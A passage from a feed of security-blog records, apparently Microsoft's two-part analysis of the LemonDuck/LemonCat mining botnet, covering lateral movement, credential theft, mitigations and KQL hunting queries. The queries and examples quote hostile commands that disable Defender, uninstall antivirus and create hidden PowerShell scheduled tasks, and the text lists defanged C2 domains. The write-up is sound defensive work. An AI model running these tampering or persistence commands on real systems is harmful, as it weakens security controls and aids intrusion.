M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-3.png)\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-4.png)\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/code-5.png)\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>)to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>)and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>)to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>)and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution so can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries lets you search for a week's worth of events. To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n![World map showing geographic distribution of LemonDuck activity](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-geographic-distribution.png)\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * 